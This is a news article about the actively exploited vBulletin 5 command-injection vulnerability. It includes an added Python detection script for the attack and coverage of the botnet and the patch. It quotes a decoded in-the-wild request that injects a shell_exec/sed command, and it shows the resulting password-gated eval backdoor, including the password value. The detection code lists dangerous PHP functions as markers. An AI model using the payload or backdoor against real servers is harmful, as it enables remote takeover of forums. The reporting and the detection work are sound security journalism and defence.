High-severity vulnerability in vBulletin is being actively exploited

Author: Amhd Net

Attackers are mass exploiting an anonymously disclosed vulnerability that makes it possible to take control of servers running vBulletin, one of the Internet’s most popular applications for website comments. Sites running the app should take comments offline until administrators install a patch that vBulletin developers released late Wednesday morning.

The vulnerability was disclosed through an 18-line exploit that was published on Monday by an unidentified person. The exploit allows unauthenticated attackers to remotely execute malicious code on just about any vBulletin server running versions 5.0.0 up to 5.5.4. The vulnerability is so severe and easy to exploit that some critics have described it as a back door.

"Essentially, any attack exploits a super simple command injection," Ryan Seguin, a research engineer at Tenable, told Ars. "An attacker sends the payload, vBulletin then runs the command, and it responds back to the attacker with whatever they asked for. If an attacker issues a shell command as part of the injection, vBulletin will run Linux commands on its host with whatever user permissions vBulletin's system-level user account has access to." Seguin has more in this technical analysis of the vulnerability.

According to researcher Troy Mursch of the Bad Packets security intelligence service, attackers are using botnets to actively exploit vulnerable servers. After decoding, some of the Web requests they send look like this:

"widgetConfig[code]=echo shell_exec('sed -i \'s/eval(\$code);/if (isset(\$_REQUEST[\"epass\"]) \&\& \$_REQUEST[\"epass\"] == \"2dmfrb28nu3c6s9j\") { eval(\$code); }/g\' includes/vb5/frontend/controller/bbcode.php && echo -n exploited | md5sum'); exit;"

Prior to the malicious Web request, code in a section of vBulletin called

includes/vb5/frontend/controller/bbcode.php

looked like this:

    function evalCode($code)
    {
        ob_start();
        eval($code);
        $output = ob_get_contents();
        ob_end_clean();
        return $output;
    }

After the Web request has been sent, the same section is changed to this:

    function evalCode($code)
    {
        ob_start();
        if (isset($_REQUEST["epass"]) && $_REQUEST["epass"] == "2dmfrb28nu3c6s9j") {
            eval($code);
        }
        $output = ob_get_contents();
        ob_end_clean();
        return $output;
    }

Mursch told Ars:

The exploit above modifies the includes/vb5/frontend/controller/bbcode.php via the "sed" command to add a backdoor to the code. This is done by setting a "password" (epass) of 2dmfrb28nu3c6s9j. By doing this, the compromised site will only execute code in the eval function if 2dmfrb28nu3c6s9j is set in future requests sent to the server. This would allow a botnet command-and-control (C2) server to exclusively exploit CVE-2019-16759 and issue commands to the targeted site.

The vulnerability itself has been regarded by some as a backdoor. This exploit attempt basically backdoors sites via a backdoor. As for why threat actors are doing this, it's likely to build an inventory of bots while they figure additional ways to exploit the compromised hosts – such as infecting them with DDoS malware and conducting denial-of-service attacks.
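Two checks a forum operator can run against what the article quotes above: one flags a request that carries PHP in the widgetConfig[code] parameter, the other inspects bbcode.php for the gated eval() that the sed command leaves behind. This is an added example and is not code from the article, from Bad Packets or from vBulletin; the sample request and the two bbcode.php snippets are constructed from the fragments quoted above, and the function names are this example's own.

```python
"""Defender-side checks for the vBulletin 5 attack quoted above.

Added example, not code from the article, from Bad Packets or from vBulletin.
The sample request and the two bbcode.php snippets are constructed here from
the fragments the article quotes; the function names are this example's own.
"""
import re
from urllib.parse import parse_qs, urlencode

# Parameter the attack smuggles PHP through (as shown in the decoded request).
INJECTED_PARAM = "widgetConfig[code]"

# Substrings that make an injected widget body worth an alert.
PAYLOAD_MARKERS = ("shell_exec", "exec(", "system(", "passthru(", "popen(",
                   "base64_decode", "sed -i", "bbcode.php")

# Request data PHP reads from; the clean evalCode() touches none of them.
SUPERGLOBALS = ("$_REQUEST", "$_GET", "$_POST", "$_COOKIE", "$_SERVER")

# Constructed: decoded payload in the shape the article shows. OLD/NEW stand in
# for the sed expression that rewrites eval($code).
DECODED_PAYLOAD = (
    "echo shell_exec('sed -i s/OLD/NEW/g includes/vb5/frontend/controller/bbcode.php"
    " && echo -n exploited | md5sum'); exit;"
)
# Constructed: the same payload URL-encoded, as it would travel in a query
# string or POST body, next to an unrelated parameter.
SAMPLE_REQUEST = urlencode({"page": "1", INJECTED_PARAM: DECODED_PAYLOAD})

# Constructed from the article: evalCode() before and after the attack.
CLEAN_BBCODE = """<?php
function evalCode($code) { ob_start(); eval($code); $output = ob_get_contents(); ob_end_clean(); return $output; }
"""
BACKDOORED_BBCODE = """<?php
function evalCode($code) { ob_start(); if (isset($_REQUEST["epass"]) && $_REQUEST["epass"] == "2dmfrb28nu3c6s9j") { eval($code); } $output = ob_get_contents(); ob_end_clean(); return $output; }
"""


def find_widget_code_injection(raw_request):
    """Return {'payload', 'markers'} if the request carries widgetConfig[code], else None."""
    params = parse_qs(raw_request, keep_blank_values=True)
    if INJECTED_PARAM not in params:
        return None
    payload = params[INJECTED_PARAM][0]
    return {"payload": payload,
            "markers": [m for m in PAYLOAD_MARKERS if m in payload]}


def _function_body(src, name):
    """Return the text between the outer braces of PHP function `name`, or None."""
    head = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", src)
    if head is None:
        return None
    depth, i = 1, head.end()
    while i < len(src) and depth:
        if src[i] == "{":
            depth += 1
        elif src[i] == "}":
            depth -= 1
        i += 1
    return src[head.end():i - 1] if depth == 0 else None


def bbcode_backdoor_indicators(php_source):
    """List reasons to believe evalCode() in bbcode.php has been tampered with."""
    body = _function_body(php_source, "evalCode")
    if body is None:
        return ["evalCode() not found; file layout differs from the quoted versions"]
    findings = [f"{sg} referenced inside evalCode()" for sg in SUPERGLOBALS if sg in body]
    # The backdoor shape Mursch describes: eval($code) gated by an if ().
    if re.search(r"if\s*\([^{]*\)\s*\{[^}]*eval\s*\(\s*\$code\s*\)", body):
        findings.append("eval($code) is wrapped in a conditional")
    secret = re.search(r"""==\s*["']([^"']+)["']""", body)
    if secret:
        findings.append(f"hard-coded comparison value: {secret.group(1)}")
    return findings


if __name__ == "__main__":
    hit = find_widget_code_injection(SAMPLE_REQUEST)
    print("request:", "ALERT" if hit else "clean", hit and hit["markers"])
    for label, src in (("clean", CLEAN_BBCODE), ("backdoored", BACKDOORED_BBCODE)):
        print(f"bbcode.php ({label}):", bbcode_backdoor_indicators(src) or "no indicators")
```

The request check keys on the parameter name rather than on any particular payload, because the payload is whatever the attacker chooses; the file check treats any reference to request data inside evalCode() as a finding, since the clean function reads none. Run the file check against a copy of bbcode.php taken from the live server, and compare the whole file against the vendor's release as well, since a tampered copy could hide changes outside evalCode().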

Some of the infected computers carrying out the attacks have been spotted in the past using the EternalBlue exploit, developed by and later stolen from the National Security Agency, to compromise computers that have yet to install a patch Microsoft released in early 2017.

Some vBulletin users took to the software’s official support pages on Wednesday to report they had been hacked. "I received an email today from my hosting provider stating that ‘malicious code was detected on your website and a huge number of email spam messages originating from it,’" one user wrote here (free account required). Another user reported having an entire MySQL database deleted.

vBulletin is among the most widely used website commenting systems and is probably used on tens of thousands—possibly hundreds of thousands—of sites. Fortunately, version 5.x makes up less than 7% of active installations, according to W3techs, a site that surveys the software used across the Internet. Still, Internet searches like this one suggest that 10,000 or more sites may be running vulnerable versions.

According to Chaouki Bekrar, founder and CEO of the Zerodium exploit broker, the vulnerability has been privately circulating for years.

"Many researchers were selling this exploit for years," he wrote on Twitter. "Zerodium customers were aware of it since 3 years."

The availability of a working exploit is aggravated by another publicly posted script that uses the Shodan search site to find vulnerable servers. Attackers can use it to generate a list of vBulletin sites that are susceptible and then use the exploit to take them over.

The vulnerability exists in default installations of the affected versions. According to Tenable’s publicly posted analysis, "an unauthenticated attacker can send a specially crafted HTTP POST request to a vulnerable vBulletin host and execute commands. These commands would be executed with the permissions of the user account that the vBulletin service is utilizing. Depending on the service user’s permissions, this could allow complete control of a host."

As advised earlier, the vulnerability is so severe that vulnerable vBulletin users should take their forums offline until they have installed the patch developers published on Wednesday morning. The commenting system for Defcon.org, a site that’s regularly probed for easy-to-hack vulnerabilities, was non-operational at the time this post went live. Several hours later the user forum returned.

Defcon founder Jeff Moss told Ars his team took the site down to avoid getting hacked.

"We tested it right away and none of our defenses would have saved us," he said. "We checked logs and such and no attempts to attack us, but after we went back online there were two in the first 30 minutes. Definitely active attackers."

Before a patch was available, people reported that they were able to successfully mitigate the vulnerability by following the instructions here. Now that a patch is available, affected vBulletin users should install it at once.

This post was updated to add exploit details from Mursch and comments from Moss.